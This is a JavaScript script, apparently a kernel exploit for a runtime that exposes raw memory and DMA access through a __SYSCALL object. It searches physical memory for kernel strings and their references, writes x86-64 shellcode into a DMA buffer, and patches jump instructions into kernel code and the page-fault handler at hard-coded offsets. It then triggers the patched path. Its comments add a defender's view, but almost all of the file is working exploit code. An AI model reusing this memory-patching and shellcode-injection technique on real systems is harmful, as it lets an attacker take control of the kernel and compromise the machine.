// Everything below depends on the runtime handing this script the __SYSCALL object, i.e.
// raw memory mapping (getSystemResources().memoryRange) and DMA allocation (allocDMA).
// From a defender's view that capability exposure, not any single offset used later, is
// the boundary to review: restrict or audit those entry points.
console.log("Starting");
// Linear scan for the byte pattern `lookFor` inside a raw memory mapping and return the
// offset of the first match, or null when nothing matches.
// The mapping comes from the runtime's __SYSCALL API (block(offset, length) then buffer());
// its semantics are not visible here — presumably a view of physical memory starting at
// MEM_START_OFFSET (TODO confirm against the runtime).
function findData(lookFor) {
  var MEM_START_OFFSET = 1;
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF).buffer());
  var locs = []; // unused: never read or appended to
  // Only the first 0x2000000 bytes are scanned; the inner compare may read up to
  // lookFor.length - 1 bytes past that bound, still inside the 0x7FFFFFFF-byte mapping.
  // An empty `lookFor` matches immediately at index 0.
  for (var i = 0; i < 0x2000000; i++) {
    var found = true;
    for (var j = 0; j < lookFor.length; j++) {
      if (memBuffer[i+j] != lookFor[j]) {
        found = false;
        break;
      }
    }
    if (found) {
      // Translate the buffer index back to the address space the mapping started at.
      return (i + MEM_START_OFFSET);
    }
  }
  // No match; callers must check for null before using the result.
  return null;
}
/**
 * Format a number as lowercase hex, left-padded with a single zero to at least two digits.
 * Values that already need two or more digits are returned unpadded.
 * @param {number} d - value to format
 * @returns {string} hex digits
 */
function decToHex(d) {
  const digits = d.toString(16);
  return digits.length < 2 ? "0" + digits : digits;
}
// Read `size` bytes of raw memory at `start` through the runtime's __SYSCALL mapping and
// return them as one contiguous lowercase hex string, two digits per byte.
// Not called anywhere in the visible script; looks like a debugging aid.
function dumpMem(start, size) {
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(start, size).buffer());
  var outStr = "";
  for (var i = 0; i < size; i++) {
    outStr += decToHex(memBuffer[i]);
  }
  return outStr;
}
// Copy the byte array `data` into raw memory at address `writeTo`, one byte at a time,
// through a Uint8Array view over a __SYSCALL mapping of exactly data.length bytes.
// NOTE(review): nothing in this script validates the destination; whether the runtime
// itself restricts what block() will map is not visible from here.
function writeData(writeTo, data) {
  var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length).buffer());
  for (var i = 0; i < data.length; i++) {
    memBuffer[i] = data[i];
  }
}
/**
 * Write several byte arrays back-to-back starting at `writeTo`, each chunk placed
 * immediately after the previous one; every chunk is delegated to writeData.
 * @param {number} writeTo - destination address of the first chunk
 * @param {number[][]} datas - chunks, written in array order
 */
function writeMultipleData(writeTo, datas) {
  let cursor = writeTo;
  for (const chunk of datas) {
    writeData(cursor, chunk);
    cursor += chunk.length;
  }
}
/**
 * Split a 32-bit address into its four little-endian bytes (least significant first).
 * Only the low 32 bits are used, since `>>` works on a 32-bit integer.
 * @param {number} pointer - address to encode
 * @returns {number[]} four values in the range 0..255
 */
function pointerToBytes(pointer) {
  return Array.from({ length: 4 }, (_, idx) => (pointer >> (idx * 8)) & 0xFF);
}
// Locate the debug marker string, then the first place its address occurs as a
// little-endian 32-bit value (presumably a reference to it from kernel code or data —
// not verifiable from this script).
// Every step below funnels through the __SYSCALL memory mapping and allocDMA; from a
// detection/mitigation standpoint those entry points are where a defense would sit.
var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0)));
// findData returns null on a miss; .toString(16) on null throws here — the miss case is not handled.
console.log("Found debug string at: ", dbgStrAddr.toString(16));
var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr));
console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16));
var codeBuf = __SYSCALL.allocDMA();
console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16));
/*
0: 48 c7 c3 00 00 e0 1c mov rbx,0x1ce00000
7: ff e3 jmp rbx
*/
// The 4-byte immediate of the mov is filled in at runtime with codeBuf.address.
var jmpData = [
  [0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address),
  [0xff, 0xe3]
];
// The -5 offset is hard-coded; presumably specific to the kernel image this was written against.
writeMultipleData(dbgStrUsageAddr - 5, jmpData);
/*
0: 48 83 c4 08 add rsp,0x8
4: 48 bf ef ee be ad de movabs rdi,0xdeadbeeeef
b: 00 00 00
e: 48 c7 c3 78 56 34 12 mov rbx,0x12345678
15: ff e3 jmp rbx
*/
// The mov immediate is again filled in at runtime, here with dbgStrUsageAddr + 4.
var shellcode = [
  [0x48, 0x83, 0xc4, 0x08],
  [0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00],
  [0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4),
  [0xff, 0xe3]
];
writeMultipleData(codeBuf.address, shellcode);
// Same locate-string-then-locate-reference pattern as above, for the page-fault message.
var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0)));
console.log("Found page fault string at: ", invalidStrAddr.toString(16));
var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr));
console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16));
// Set unconditional jump in page fault handler
// -251 is another hard-coded, image-specific offset; a single byte (0xEB) is written.
writeData(invalidStrUsageAddr - 251, [0xEB]);
console.log("Finished writing shellcode");
__SYSCALL.debug();
console.log("Finished calling debug");